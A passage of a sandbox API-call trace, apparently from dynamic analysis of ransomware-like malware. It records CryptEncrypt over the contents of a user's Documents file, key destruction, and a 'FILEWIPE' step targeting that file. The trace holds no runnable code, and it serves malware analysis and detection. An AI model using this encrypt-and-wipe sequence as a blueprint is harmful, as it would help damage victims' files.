hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.825] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.825] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.825] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.825] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0033.825] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.826] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x18da3, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x18db0) returned 1 [0033.826] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.826] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.826] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.826] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.826] CharLowerBuffW (in: lpsz="byte[101809]", cchLength=0xc | out: lpsz="byte[101809]") returned 0xc [0033.826] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.827] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.828] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.828] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.828] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.828] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8a8d60*, pdwDataLen=0x6ae220*=0x18da3, dwBufLen=0x18db0 | out: pbData=0x8a8d60*, pdwDataLen=0x6ae220*=0x18db0) returned 1 [0033.829] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.829] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.829] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.829] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.829] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.829] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.829] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0033.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.829] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.829] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.829] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.829] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0033.829] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.829] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.829] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.829] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.829] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0033.829] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.837] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.837] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.837] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.840] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.840] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.840] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0033.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.840] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.840] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.840] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0033.840] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.840] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0033.840] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.840] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.840] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0033.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.841] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.841] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.841] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0033.841] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0033.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0033.841] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.841] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.841] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0033.841] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0033.841] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0033.841] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.841] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.841] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.841] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0033.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.841] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.842] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.842] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.842] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.842] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.842] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0033.842] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0033.842] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.842] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0033.842] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.842] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0033.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0033.842] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.842] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.842] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0033.842] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.842] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.843] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0033.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0033.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0033.849] FreeLibrary (hLibModule=0x754b0000) returned 1 [0033.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0033.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0033.849] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0033.849] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.849] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0033.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0033.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0033.850] CloseHandle (hObject=0x128) returned 1 [0033.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0033.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0033.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0033.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0033.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0033.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0033.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0033.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0033.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0033.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0033.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0033.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0033.851] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0033.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0033.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.851] CloseHandle (hObject=0x140) returned 1 [0033.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0033.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0033.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0033.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.854] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.855] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.855] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0033.855] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.855] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.855] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18ea7870, ftCreationTime.dwHighDateTime=0x1d5b8f7, ftLastAccessTime.dwLowDateTime=0xeae0d5a0, ftLastAccessTime.dwHighDateTime=0x1d5c152, ftLastWriteTime.dwLowDateTime=0xeae0d5a0, ftLastWriteTime.dwHighDateTime=0x1d5c152, nFileSizeHigh=0x0, nFileSizeLow=0x18da3, dwReserved0=0x0, dwReserved1=0x777648, cFileName="6v0 IGSxNnE4wY28.pps", cAlternateFileName="6V0IGS~1.PPS")) returned 0x7c2100 [0033.856] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0033.856] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.856] CharLowerBuffW (in: lpsz="byte[101795]", cchLength=0xc | out: lpsz="byte[101795]") returned 0xc [0033.856] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.856] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | 